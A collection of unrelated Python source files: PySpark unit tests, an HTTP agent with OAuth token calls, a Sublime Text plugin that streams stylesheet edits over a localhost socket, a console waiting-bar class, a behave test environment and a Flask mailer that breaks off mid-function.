temp = tempfile.NamedTemporaryFile(delete=True)
temp.close()
path = temp.name
def sleep(x):
import os
import time
with open(path, 'w') as f:
f.write("%d %d" % (os.getppid(), os.getpid()))
time.sleep(100)
# start job in background thread
def run():
try:
self.sc.parallelize(range(1), 1).foreach(sleep)
except Exception:
pass
import threading
t = threading.Thread(target=run)
t.daemon = True
t.start()
daemon_pid, worker_pid = 0, 0
while True:
if os.path.exists(path):
with open(path) as f:
data = f.read().split(' ')
daemon_pid, worker_pid = map(int, data)
break
time.sleep(0.1)
# cancel jobs
self.sc.cancelAllJobs()
t.join()
for i in range(50):
try:
os.kill(worker_pid, 0)
time.sleep(0.1)
except OSError:
break # worker was killed
else:
self.fail("worker has not been killed after 5 seconds")
try:
os.kill(daemon_pid, 0)
except OSError:
self.fail("daemon had been killed")
# run a normal job
rdd = self.sc.parallelize(xrange(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_after_exception(self):
def raise_exception(_):
raise Exception()
rdd = self.sc.parallelize(xrange(100), 1)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: rdd.foreach(raise_exception))
self.assertEqual(100, rdd.map(str).count())
def test_after_jvm_exception(self):
tempFile = tempfile.NamedTemporaryFile(delete=False)
tempFile.write(b"Hello World!")
tempFile.close()
data = self.sc.textFile(tempFile.name, 1)
filtered_data = data.filter(lambda x: True)
self.assertEqual(1, filtered_data.count())
os.unlink(tempFile.name)
with QuietTest(self.sc):
self.assertRaises(Exception, lambda: filtered_data.count())
rdd = self.sc.parallelize(xrange(100), 1)
self.assertEqual(100, rdd.map(str).count())
def test_accumulator_when_reuse_worker(self):
from pyspark.accumulators import INT_ACCUMULATOR_PARAM
acc1 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(xrange(100), 20).foreach(lambda x: acc1.add(x))
self.assertEqual(sum(range(100)), acc1.value)
acc2 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
self.sc.parallelize(xrange(100), 20).foreach(lambda x: acc2.add(x))
self.assertEqual(sum(range(100)), acc2.value)
self.assertEqual(sum(range(100)), acc1.value)
def test_reuse_worker_after_take(self):
rdd = self.sc.parallelize(xrange(100000), 1)
self.assertEqual(0, rdd.first())
def count():
try:
rdd.count()
except Exception:
pass
t = threading.Thread(target=count)
t.daemon = True
t.start()
t.join(5)
self.assertTrue(not t.isAlive())
self.assertEqual(100000, rdd.count())
def test_with_different_versions_of_python(self):
rdd = self.sc.parallelize(range(10))
rdd.count()
version = self.sc.pythonVer
self.sc.pythonVer = "2.0"
try:
with QuietTest(self.sc):
self.assertRaises(Py4JJavaError, lambda: rdd.count())
finally:
self.sc.pythonVer = version
class SparkSubmitTests(unittest.TestCase):
def setUp(self):
self.programDir = tempfile.mkdtemp()
self.sparkSubmit = os.path.join(os.environ.get("SPARK_HOME"), "bin", "spark-submit")
def tearDown(self):
shutil.rmtree(self.programDir)
def createTempFile(self, name, content, dir=None):
"""
Create a temp file with the given name and content and return its path.
Strips leading spaces from content up to the first '|' in each line.
"""
pattern = re.compile(r'^ *\|', re.MULTILINE)
content = re.sub(pattern, '', content.strip())
if dir is None:
path = os.path.join(self.programDir, name)
else:
os.makedirs(os.path.join(self.programDir, dir))
path = os.path.join(self.programDir, dir, name)
with open(path, "w") as f:
f.write(content)
return path
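    # Illustration (not part of the original tests): the '|' margin marker lets the
    # embedded scripts keep readable indentation, e.g.
    #   createTempFile("demo.py", """
    #       |print("hi")
    #       """)
    # writes a file whose only line is print("hi") -- the leading spaces and the
    # first '|' of each line are stripped by the regex above.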
def createFileInZip(self, name, content, ext=".zip", dir=None, zip_name=None):
"""
Create a zip archive containing a file with the given content and return its path.
Strips leading spaces from content up to the first '|' in each line.
"""
pattern = re.compile(r'^ *\|', re.MULTILINE)
content = re.sub(pattern, '', content.strip())
if dir is None:
path = os.path.join(self.programDir, name + ext)
else:
path = os.path.join(self.programDir, dir, zip_name + ext)
zip = zipfile.ZipFile(path, 'w')
zip.writestr(name, content)
zip.close()
return path
def create_spark_package(self, artifact_name):
group_id, artifact_id, version = artifact_name.split(":")
self.createTempFile("%s-%s.pom" % (artifact_id, version), ("""
|<?xml version="1.0" encoding="UTF-8"?>
|<project xmlns="http://maven.apache.org/POM/4.0.0"
| xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
| xsi:schemaLocation="http://maven.apache.org/POM/4.0.0
| http://maven.apache.org/xsd/maven-4.0.0.xsd">
| <modelVersion>4.0.0</modelVersion>
| <groupId>%s</groupId>
| <artifactId>%s</artifactId>
| <version>%s</version>
|</project>
""" % (group_id, artifact_id, version)).lstrip(),
os.path.join(group_id, artifact_id, version))
self.createFileInZip("%s.py" % artifact_id, """
|def myfunc(x):
| return x + 1
""", ".jar", os.path.join(group_id, artifact_id, version),
"%s-%s" % (artifact_id, version))
def test_single_script(self):
"""Submit and test a single script file"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(lambda x: x * 2).collect())
""")
proc = subprocess.Popen([self.sparkSubmit, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 4, 6]", out.decode('utf-8'))
def test_script_with_local_functions(self):
"""Submit and test a single script file calling a global function"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|def foo(x):
| return x * 3
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(foo).collect())
""")
proc = subprocess.Popen([self.sparkSubmit, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[3, 6, 9]", out.decode('utf-8'))
def test_module_dependency(self):
"""Submit and test a script with a dependency on another module"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(myfunc).collect())
""")
zip = self.createFileInZip("mylib.py", """
|def myfunc(x):
| return x + 1
""")
proc = subprocess.Popen([self.sparkSubmit, "--py-files", zip, script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out.decode('utf-8'))
def test_module_dependency_on_cluster(self):
"""Submit and test a script with a dependency on another module on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(myfunc).collect())
""")
zip = self.createFileInZip("mylib.py", """
|def myfunc(x):
| return x + 1
""")
proc = subprocess.Popen([self.sparkSubmit, "--py-files", zip, "--master",
"local-cluster[1,1,1024]", script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out.decode('utf-8'))
def test_package_dependency(self):
"""Submit and test a script with a dependency on a Spark Package"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(myfunc).collect())
""")
self.create_spark_package("a:mylib:0.1")
proc = subprocess.Popen([self.sparkSubmit, "--packages", "a:mylib:0.1", "--repositories",
"file:" + self.programDir, script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out.decode('utf-8'))
def test_package_dependency_on_cluster(self):
"""Submit and test a script with a dependency on a Spark Package on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|from mylib import myfunc
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(myfunc).collect())
""")
self.create_spark_package("a:mylib:0.1")
proc = subprocess.Popen([self.sparkSubmit, "--packages", "a:mylib:0.1", "--repositories",
"file:" + self.programDir, "--master",
"local-cluster[1,1,1024]", script], stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 3, 4]", out.decode('utf-8'))
def test_single_script_on_cluster(self):
"""Submit and test a single script on a cluster"""
script = self.createTempFile("test.py", """
|from pyspark import SparkContext
|
|def foo(x):
| return x * 2
|
|sc = SparkContext()
|print(sc.parallelize([1, 2, 3]).map(foo).collect())
""")
# this will fail if you have different spark.executor.memory
# in conf/spark-defaults.conf
proc = subprocess.Popen(
[self.sparkSubmit, "--master", "local-cluster[1,1,1024]", script],
stdout=subprocess.PIPE)
out, err = proc.communicate()
self.assertEqual(0, proc.returncode)
self.assertIn("[2, 4, 6]", out.decode('utf-8'))
class ContextTests(unittest.TestCase):
def test_failed_sparkcontext_creation(self):
# Regression test for SPARK-1550
self.assertRaises(Exception, lambda: SparkContext("an-invalid-master-name"))
def test_get_or_create(self):
with SparkContext.getOrCreate() as sc:
self.assertTrue(SparkContext.getOrCreate() is sc)
def test_parallelize_eager_cleanup(self):
with SparkContext() as sc:
temp_files = os.listdir(sc._temp_dir)
rdd = sc.parallelize([0, 1, 2])
post_parallalize_temp_files = os.listdir(sc._temp_dir)
self.assertEqual(temp_files, post_parallalize_temp_files)
def test_stop(self):
sc = SparkContext()
self.assertNotEqual(SparkContext._active_spark_context, None)
sc.stop()
self.assertEqual(SparkContext._active_spark_context, None)
def test_with(self):
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
self.assertEqual(SparkContext._active_spark_context, None)
def test_with_exception(self):
try:
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
raise Exception()
except:
pass
self.assertEqual(SparkContext._active_spark_context, None)
def test_with_stop(self):
with SparkContext() as sc:
self.assertNotEqual(SparkContext._active_spark_context, None)
sc.stop()
self.assertEqual(SparkContext._active_spark_context, None)
def test_progress_api(self):
with SparkContext() as sc:
sc.setJobGroup('test_progress_api', '', True)
rdd = sc.parallelize(range(10)).map(lambda x: time.sleep(100))
def run():
try:
rdd.count()
except Exception:
pass
t = threading.Thread(target=run)
t.daemon = True
t.start()
# wait for scheduler to start
time.sleep(1)
tracker = sc.statusTracker()
jobIds = tracker.getJobIdsForGroup('test_progress_api')
self.assertEqual(1, len(jobIds))
job = tracker.getJobInfo(jobIds[0])
self.assertEqual(1, len(job.stageIds))
stage = tracker.getStageInfo(job.stageIds[0])
self.assertEqual(rdd.getNumPartitions(), stage.numTasks)
sc.cancelAllJobs()
t.join()
# wait for event listener to update the status
time.sleep(1)
job = tracker.getJobInfo(jobIds[0])
self.assertEqual('FAILED', job.status)
self.assertEqual([], tracker.getActiveJobsIds())
self.assertEqual([], tracker.getActiveStageIds())
sc.stop()
def test_startTime(self):
with SparkContext() as sc:
self.assertGreater(sc.startTime, 0)
class ConfTests(unittest.TestCase):
def test_memory_conf(self):
memoryList = ["1T", "1G", "1M", "1024K"]
for memory in memoryList:
sc = SparkContext(conf=SparkConf().set("spark.python.worker.memory", memory))
l = list(range(1024))
random.shuffle(l)
rdd = sc.parallelize(l, 4)
self.assertEqual(sorted(l), rdd.sortBy(lambda x: x).collect())
sc.stop()
@unittest.skipIf(not _have_scipy, "SciPy not installed")
class SciPyTests(PySparkTestCase):
"""General PySpark tests that depend on scipy """
def test_serialize(self):
from scipy.special import gammaln
x = range(1, 5)
expected = list(map(gammaln, x))
observed = self.sc.parallelize(x).map(gammaln).collect()
self.assertEqual(expected, observed)
@unittest.skipIf(not _have_numpy, "NumPy not installed")
class NumPyTests(PySparkTestCase):
"""General PySpark tests that depend on numpy """
def test_statcounter_array(self):
x = self.sc.parallelize([np.array([1.0, 1.0]), np.array([2.0, 2.0]), np.array([3.0, 3.0])])
s = x.stats()
self.assertSequenceEqual([2.0, 2.0], s.mean().tolist())
self.assertSequenceEqual([1.0, 1.0], s.min().tolist())
self.assertSequenceEqual([3.0, 3.0], s.max().tolist())
self.assertSequenceEqual([1.0, 1.0], s.sampleStdev().tolist())
stats_dict = s.asDict()
self.assertEqual(3, stats_dict['count'])
self.assertSequenceEqual([2.0, 2.0], stats_dict['mean'].tolist())
self.assertSequenceEqual([1.0, 1.0], stats_dict['min'].tolist())
self.assertSequenceEqual([3.0, 3.0], stats_dict['max'].tolist())
self.assertSequenceEqual([6.0, 6.0], stats_dict['sum'].tolist())
self.assertSequenceEqual([1.0, 1.0], stats_dict['stdev'].tolist())
self.assertSequenceEqual([1.0, 1.0], stats_dict['variance'].tolist())
stats_sample_dict = s.asDict(sample=True)
self.assertEqual(3, stats_dict['count'])
self.assertSequenceEqual([2.0, 2.0], stats_sample_dict['mean'].tolist())
self.assertSequenceEqual([1.0, 1.0], stats_sample_dict['min'].tolist())
self.assertSequenceEqual([3.0, 3.0], stats_sample_dict['max'].tolist())
self.assertSequenceEqual([6.0, 6.0], stats_sample_dict['sum'].tolist())
self.assertSequenceEqual(
[0.816496580927726, 0.816496580927726], stats_sample_dict['stdev'].tolist())
self.assertSequenceEqual(
[0.6666666666666666, 0.6666666666666666], stats_sample_dict['variance'].tolist())
if __name__ == "__main__":
from pyspark.tests import *
if not _have_scipy:
print("NOTE: Skipping SciPy tests as it does not seem to be installed")
if not _have_numpy:
print("NOTE: Skipping NumPy tests as it does not seem to be installed")
if xmlrunner:
unittest.main(testRunner=xmlrunner.XMLTestRunner(output='target/test-reports'))
else:
unittest.main()
if not _have_scipy:
print("NOTE: SciPy tests were skipped as it does not seem to be installed")
if not _have_numpy:
print("NOTE: NumPy tests were skipped as it does not seem to be installed")
|
BasicHttpAgent.py
|
# pip3 install requests Flask
from ..IOAgent import IOAgent
from abc import ABC
from http.server import HTTPServer, BaseHTTPRequestHandler
from http.client import HTTPSConnection, HTTPConnection
from base64 import b64encode
import sseclient
import requests
import threading
import platform
import subprocess
import pprint
import cgi
import json
import logging
IOAgent = IOAgent
module_logger = logging.getLogger('BasicHttpAgent')
#https://stackoverflow.com/questions/2953462/pinging-servers-in-python
def ping(host):
"""
Returns True if host (str) responds to a ping request.
Remember that a host may not respond to a ping (ICMP) request even if the host name is valid.
"""
# Option for the number of packets as a function of
param = '-n' if platform.system().lower()=='windows' else '-c'
    if host.startswith('['):  # bracketed ipv6 address, e.g. "[::1]"
        host = host.strip('[]')
        command = ['ping', param, '1', '-6', host]
else:
# Building the command. Ex: "ping -c 1 google.com"
command = ['ping', param, '1', host]
return subprocess.call(command) == 0
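# Usage sketch (hypothetical addresses): ping('192.0.2.1') returns False when the
# host does not answer, so callers can guard connect() without catching exceptions;
# a bracketed IPv6 literal such as '[::1]' is unwrapped and pinged with '-6'.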
"""
app = Flask(__name__)
@app.route("/<url>", methods = ['POST'])
def http_endpoint(url):
return {
"message": "request OK"
}, 200 """
#todo: make child classes for specific adapters for data validation/transformation depending on use-case
class BasicHttpAgent(IOAgent, ABC):
def __init__(self, *args):
super().__init__(*args)
self.logger = logging.getLogger('BasicHttpAgent')
self.connection = None
self.headers = {}
class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
def __init__(self, adapter, *args):
self.adapter = adapter
super().__init__(*args)
def set_headers(self, statuscode):
self.send_response(statuscode)
self.send_header('Content-type', 'application/json')
self.end_headers()
#https://gist.github.com/nitaku/10d0662536f37a087e1b
def do_POST(self):
ctype, pdict = cgi.parse_header(self.headers.get('content-type'))
# refuse to receive non-json content
if ctype != 'application/json':
self.set_headers(400)
return
# read the message and convert it into a python dictionary
length = int(self.headers.get('content-length'))
message = json.loads(self.rfile.read(length))
# send the message back
self.set_headers(200)
self.wfile.write(str.encode(json.dumps({'received': 'ok'})))
self.adapter.receive_from_downlink(message)
def initiate_agent(self, config, callback):
self.connection_host = f"{self.connection_ip}:{self.port}"
self.connection_url = f"http://{self.connection_host}" # + config url
self.host_url = "/" # + config
self.message_received_callback = callback
# https://stackoverflow.com/questions/18444395/basehttprequesthandler-with-custom-instance
# def handler(*args):
# return BasicHttpAdapter.SimpleHTTPRequestHandler(self, *args)
# self.httpd = HTTPServer(('localhost', 5000), handler)
# threading.Thread(target=self.httpd.serve_forever).start()
def send_downlink(self, message, *args):
requests.post(self.connection_url, message)
def receive_from_downlink(self, message):
#if url == self.host_url:
        # parse incoming message
self.from_downlink_to_central(message)
def disconnect(self, *args):
self.on_disconnect()
def connect(self, *args):
# if ping(self.connection_ip):
self.on_connect()
def set_headers(self, headers):
self.headers = headers
def basic_auth(self, uri):
self.connection = HTTPSConnection(f"{self.connection_ip}:{self.port}")
# authenticate with client_id and client_secret
auth_string = b64encode(bytes(self.user + ':' + self.password, "utf-8")).decode("ascii")
headers = {
'Content-type': "application/x-www-form-urlencoded",
'Authorization': 'Basic %s' % auth_string
}
body = f"grant_type=client_credentials"
self.connection.request('POST', f'/{uri}', headers=headers, body=bytes(body, encoding="utf-8"))
res = self.connection.getresponse()
data = res.read()
self.logger.debug("successfully authenticated")
return data
def rpt_auth(self, uri, access_token):
self.connection = HTTPSConnection(f"{self.connection_ip}:{self.port}")
# authenticate with access token
headers = {
'Content-type': "application/x-www-form-urlencoded",
'Authorization': 'Bearer %s' % access_token
}
body = f"grant_type=urn:ietf:params:oauth:grant-type:uma-ticket&audience=policy-enforcer"
self.connection.request('POST', f'/{uri}', headers=headers, body=bytes(body, encoding="utf-8"))
res = self.connection.getresponse()
data = res.read()
self.logger.debug("successfully got RTP token")
return data
def refresh_rpt(self, uri, refresh_token):
self.connection = HTTPSConnection(f"{self.connection_ip}:{self.port}")
# authenticate with access token
headers = {
'Content-type': "application/x-www-form-urlencoded"
}
body = f"grant_type=refresh_token&refresh_token={refresh_token}&client_id={self.user}&client_secret={self.password}"
self.connection.request('POST', f'/{uri}', headers=headers, body=bytes(body, encoding="utf-8"))
res = self.connection.getresponse()
data = res.read()
self.logger.debug("successfully refreshed token")
return data
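    # Token flow sketch (the endpoint path is an assumption, Keycloak-style; not part
    # of the original class):
    #   raw = agent.basic_auth("auth/realms/demo/protocol/openid-connect/token")
    #   access_token = json.loads(raw).get("access_token")
    #   rpt = agent.rpt_auth("auth/realms/demo/protocol/openid-connect/token", access_token)
    #   # later, when the RPT expires:
    #   refreshed = agent.refresh_rpt("auth/realms/demo/protocol/openid-connect/token",
    #                                 json.loads(raw).get("refresh_token"))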
def get_stream(self, uri):
try:
headers = {
'Accept': "text/event-stream"
}
response = requests.get(uri, stream=True, headers=headers)
client = sseclient.SSEClient(response)
for event in client.events():
# pprint.pprint(json.loads(event.data))
self.message_received_callback(event.data)
except Exception as e:
self.logger.error("failed to parse message: " + str(e))
def on_message_received(self, client, config, msg):
self.logger.debug("received message")
data = msg.payload
try:
if isinstance(data, str):
payload = json.loads(json.dumps(data))
else:
payload = json.loads(data)
self.message_received_callback(payload)
except Exception as e:
self.logger.error("failed to parse message: " + str(e))
def send_message(self, uri, msg, method):
self.connection = HTTPConnection(host=self.connection_ip, port=self.port, timeout=128)
try:
self.connection.request(method, f'/{uri}', body=msg, headers=self.headers)
res = self.connection.getresponse()
data = res.read()
self.logger.debug(method + " " + uri + " returned " + str(res.status))
self.connection.close()
return res.status, data
except Exception as e:
self.logger.error("failed to parse or send message: " + str(e))
def send_secure_message(self, uri, msg, token):
self.connection = HTTPSConnection(f"{self.connection_ip}:{self.port}")
try:
headers = {
'Authorization': 'Bearer %s' % token
}
self.logger.debug(msg)
self.connection.request('POST', f'/{uri}', headers=headers, body=msg)
res = self.connection.getresponse()
data = res.read()
self.logger.debug(data)
self.connection.close()
return res.status
except Exception as e:
self.logger.error("failed to parse or send message: " + str(e))
|
takana.py
|
import sublime, sublime_plugin, time, os.path, json, threading, sys, socket
from threading import Thread
try:
import socketserver
except ImportError:
import SocketServer as socketserver
VERSION = "Takana plugin v0.4"
DEBUG = False
TAKANA_SERVER_PORT = 48628
st_ver = 3000 if sublime.version() == '' else int(sublime.version())
print("***************************************")
print(VERSION)
class Error:
region_key = 'error_dot'
def __init__(self, file, line):
self.file = file
self.line = line
self.view = None
def update_view(self, view):
self.clear()
self.view = view
self.show()
def show(self):
if not self.view:
return
position = self.view.text_point(self.line - 1, 0)
region = sublime.Region(position, position)
scope = 'markup.deleted'
icon = 'dot'
self.view.add_regions(self.region_key, [region], scope, icon)
def clear(self):
if not self.view:
return
self.view.erase_regions(self.region_key)
class WindowWatcher(sublime_plugin.EventListener):
def on_close(self, view):
buffer_is_open = False
if not view.is_dirty():
return
for w in sublime.windows():
for v in w.views():
if v.buffer_id() == view.buffer_id():
buffer_is_open = True
if not buffer_is_open:
connection_manager.post(Message(['editor', 'reset'], {'path': view.file_name()}))
class ErrorManager(sublime_plugin.EventListener):
errors = {}
def on_activated_async(self, view):
ErrorManager.register_view(view)
@staticmethod
def put(file, line):
error = Error(file, line)
ErrorManager.errors[file] = error
# Check if the current view is the one for our error
ErrorManager.register_view(sublime.active_window().active_view())
@staticmethod
def remove(file):
if file in ErrorManager.errors:
ErrorManager.errors[file].clear()
del ErrorManager.errors[file]
@staticmethod
def remove_all():
keys = list(ErrorManager.errors.keys())
for file in keys:
ErrorManager.remove(file)
@staticmethod
def get(file):
if file in ErrorManager.errors:
return ErrorManager.errors[file]
else:
return None
@staticmethod
def register_view(view):
filename = view.file_name()
if filename:
error = ErrorManager.get(filename)
if error:
error.update_view(view)
class TakanaTCPHandler(socketserver.BaseRequestHandler):
def handle(self):
message = self.request.recv(1024).decode("utf-8")
message = Message.decode(message)
if message.event == ['project', 'errors', 'add']:
line = message.data['error']['line']
file = message.data['error']['file']
ErrorManager.put(file, line)
if message.event == ['goto', 'line']:
line = message.data['line']
file = message.data['file']
view = sublime.active_window().open_file(file)
time.sleep(0.1)
view.run_command("goto_line", {"line": line} )
elif message.event == ['project', 'errors', 'remove']:
ErrorManager.remove_all()
# ErrorManager.remove(message.data['error']['file'])
class TakanaSocketServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
# Ctrl-C will cleanly kill all spawned threads
daemon_threads = True
# much faster rebinding
allow_reuse_address = True
def __init__(self, server_address, RequestHandlerClass):
socketserver.TCPServer.__init__(self, server_address, RequestHandlerClass)
if st_ver >= 3000:
try:
socket_server = TakanaSocketServer(('localhost', TAKANA_SERVER_PORT), TakanaTCPHandler)
Thread(target=socket_server.serve_forever).start()
except Exception as e:
print('Takana: could not start server')
def plugin_unloaded():
print('Takana: closing socket server...')
if 'socket_server' in globals():
socket_server.shutdown()
socket_server.server_close()
pass
class Message:
def __init__(self, event, data):
self.event = event
self.data = data
def encode(self):
return json.dumps(self.event + [self.data])
@staticmethod
def decode(data):
message = json.loads(data)
data = message.pop()
event = message
return Message(event, data)
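# Wire-format sketch (illustrative values): Message(['editor', 'update'], {'path': 'a.scss'}).encode()
# produces '["editor", "update", {"path": "a.scss"}]'; Message.decode() pops the trailing
# element back off as data and keeps the remaining items as the event list.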
class Edit:
file_name = None
file_extension = None
time = None
def __init__(self, file_name, text, time):
self.file_name = file_name
self.text = text
self.time = time
def as_message(self):
data = {
'buffer' : self.text,
'path' : self.file_name,
'created_at' : self.time
}
return Message(['editor', 'update'], data)
class ConnectionManager:
socket = None
last_message = None
def __init__(self):
pass
def __connect(self):
print('Takana: connecting')
try:
serverHost = 'localhost' # servername is localhost
serverPort = 48627
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # create a TCP socket
self.socket.settimeout(0.5)
self.socket.connect((serverHost, serverPort)) # connect to server on the port
except Exception as e:
self.socket = None
print('Takana: connection failed')
def __post(self):
msg = self.last_message.encode()
try:
if self.socket:
print("Takana: sending update....")
if st_ver >= 3000:
self.socket.send(bytes(msg + "\n","utf8"))
else:
self.socket.sendall(msg + "\n")
else:
self.__connect()
except socket.error as e:
print('Takana: socket exception occurred:')
print(e)
try:
self.socket.shutdown(socket.SHUT_WR)
self.socket.close()
except Exception as e:
print('Takana: socket already closed')
self.socket = None
print('Takana: Reconnecting')
self.__connect()
except socket.timeout:
print('Takana: socket timeout')
except IOError as e:
print('Takana: socket ioerror')
print(e)
except Exception as e:
print('Takana: post failed')
print(e)
def connect(self):
self.__connect()
def post(self, message):
self.last_message = message
self.__post()
connection_manager = ConnectionManager()
connection_manager.connect()
#
#
#
# TakanaEditListener
#
#
#
class DelayedTimer:
def __init__(self, delay, callback):
self.delay = delay
self.callback = callback
self.lastRequest = 0
self.scheduleTimer()
def scheduleTimer(self):
sublime.set_timeout(self.onTimer, int(self.delay * 1000))
def onTimer(self):
self.scheduleTimer()
if self.lastRequest > 0 and self.lastRequest + self.delay < time.time():
self.lastRequest = 0
self.callback()
def notify(self):
self.lastRequest = time.time()
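# DelayedTimer is a simple debounce: notify() only records the time of the last call,
# and the periodic onTimer() fires the callback once no further notify() has arrived
# for `delay` seconds -- so a burst of rapid keystrokes collapses into a single update.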
class TakanaEditListener(sublime_plugin.EventListener):
delay = 0.035
view = None
supported_file_types = [".css", ".scss", ".sass", ".less"]
def __init__(self):
self.timer = DelayedTimer(self.delay, self.on_keystroke_end)
def on_modified(self, view):
if self.__should_monitor(view):
# find & replace
if view.command_history(0, True) == (u'', None, 1):
print('forcing update')
self.__on_change(view)
def on_keystroke_end(self):
timestamp = int(round(time.time() * 1000)) - (self.delay * 1000)
edit = Edit(
self.view.file_name(),
self.__text(),
timestamp
)
connection_manager.post(edit.as_message())
if DEBUG:
print('time_since_keystroke: ' + str( int(round(time.time() * 1000)) - timestamp - (self.delay * 1000) ))
def __on_change(self, view):
self.view = view
self.timer.notify()
def __should_monitor(self, view):
should_monitor = False
if view and view.file_name():
file_name, file_extension = os.path.splitext(view.file_name())
should_monitor = file_extension in self.supported_file_types
return should_monitor
def __text(self):
return self.view.substr(sublime.Region(0, self.view.size()))
|
waitingbar.py
|
#!/usr/bin/env python3
import sys
import threading
import time
from itertools import cycle
class WaitingBar(object):
'''
This class prints a fancy waiting bar with Greek chars and spins.
It uses a thread to keep printing the bar while the main program runs
Usage:
THE_BAR = WaitingBar('Your Message Here')
# Do something slow here
(...)
THE_BAR.stop()
copyright phoemur - 2016
'''
def __init__(self, message='[*] Wait until loading is complete...'):
self.MESSAGE = ' ' + str(message)
self.CYCLES = ['-', '-', '\\', '\\', '|', '|', '/', '/', '-', '-', '\\', '\\', '|', '|', '/', '/']
self.intab = u'abcdefghijklmnopqrstuvwxyzáàãâéèẽêíìîĩóòôõúùũûçABCDEFGHIJKLMNOPQRSTUVWXYZÁÀÃÂÉÈẼÊÍÌÎĨÓÒÔÕÚÙŨÛÇ'
self.outab = u'αβ¢ΔεϝγηιφκλμνΩπσϼΣτυϞωχψζααααεεεειιιιΩΩΩΩυυυυ¢αβ¢ΔεϝγηιφκλμνΩπσϼΣτυϞωχψζααααεεεειιιιΩΩΩΩυυυυ¢'
self.TABLE = {x: y for x, y in zip(self.intab, self.outab)}
self.event = threading.Event()
self.waiting_bar = threading.Thread(target=self.start, args=(self.event,))
self.waiting_bar.start()
def start(self, e):
for index in cycle(range(len(self.MESSAGE))):
if e.is_set():
break
if not self.MESSAGE[index].isalpha():
continue
for c in self.CYCLES:
buff = list(self.MESSAGE)
buff.append(c)
try:
if sys.stdout.encoding.upper() == 'UTF-8':
buff[index] = self.TABLE[buff[index]]
else:
buff[index] = buff[index].swapcase()
except KeyError:
pass
sys.stdout.write(''.join(buff))
time.sleep(0.05)
sys.stdout.write('\r')
sys.stdout.flush()
def stop(self):
self.event.set()
self.waiting_bar.join()
sys.stdout.write(self.MESSAGE + ' \n')
if __name__ == '__main__':
'''
A simple example to demonstrate the class in action
'''
# Start the bar
THE_BAR = WaitingBar('[*] Calculating useless stuff...')
# Do something slow
import math
from pprint import pprint
a_list = {a: b for a, b in zip(range(1, 41), map(math.factorial, range(1, 41)))}
time.sleep(20)
# Stop the bar and print result
THE_BAR.stop()
pprint(a_list)
|
environment.py
|
import threading
from wsgiref import simple_server
from handlers import app
from config import session
from repo import Repo
def clear_database():
with session() as db:
repo = Repo(db)
repo.clear_database()
db.commit()
def before_all(context):
context.host = 'localhost'
context.port = 8000
context.base_url = 'http://' + context.host + ':' + str(context.port)
context.server = simple_server.make_server(
host=context.host,
port=context.port,
app=app
)
context.thread = threading.Thread(target=context.server.serve_forever)
context.thread.start()
def after_all(context):
clear_database()
context.server.shutdown()
context.thread.join()
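# Sketch of a step implementation that could use this environment (the feature wording
# and the `requests` dependency are assumptions, not part of this file):
#
#   from behave import when
#
#   @when('the client requests the root resource')
#   def step_impl(context):
#       import requests
#       context.response = requests.get(context.base_url + '/')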
|
mailer.py
|
from flask import render_template
from flask_mail import Message
from threading import Thread
from app import mail
from app import webapp
from app.decorators import async
from premailer import Premailer, transform
from app.models import Utils
class Mailer():
@staticmethod
def send_async_mail(webapp, email):
with webapp.app_context():
mail.send(email)
@staticmethod
def excessOrder(user_id, item_id):
subject = "Excess Order Request"
email = Message(subject,
recipients=['contact@ostrichapp.in'])
email.body = "%d Tried to order Item %d" %(user_id, item_id)
mail.send(email)
return True
@staticmethod
def genericMailer(mail_obj, recipients=['contact@ostrichapp.in']):
with webapp.app_context():
email = Message(mail_obj['subject'],
recipients=recipients)
email.body = mail_obj['body']
mail.send(email)
return True
@staticmethod
@async
def welcomeMailer(user):
name = Utils.getUserName(user)
with webapp.app_context():
email = Message('Welcome to Ostrich!',
recipients=[user.email])
email.html = transform(render_template('mailers/welcome.html', name=name))
mail.send(email)
return True
@staticmethod
    # TODO: substitute @sync
def thankyou(user):
name = Utils.getUserName(user)
email = Message('Thank you for offering your book.',
recipients=[user.email])
email.html = render_template('mailers/inlined/thank_you.html', name=name)
thr = Thread(target=Mailer.send_async_mail, args=[webapp, email])
thr.start()
return True
@staticmethod
@async
def sendUpsellEmail(data):
name = Utils.getUserName(data['user'])
with webapp.app_context():
consumer_mail = render_template('mailers/extend_order.html',
name = name,
book_name = data['book_name'],
order_id = data['order_id'],
items = data['items'],
curated_items = data['curated_items'],
quote = data['quote'],
quote_author = data['quote_author'])
pre = Premailer(consumer_mail, remove_classes=False, strip_important=False)
consumer_mail = pre.transform()
email = Message('Enjoying the book?',
recipients=[data['user'].email])
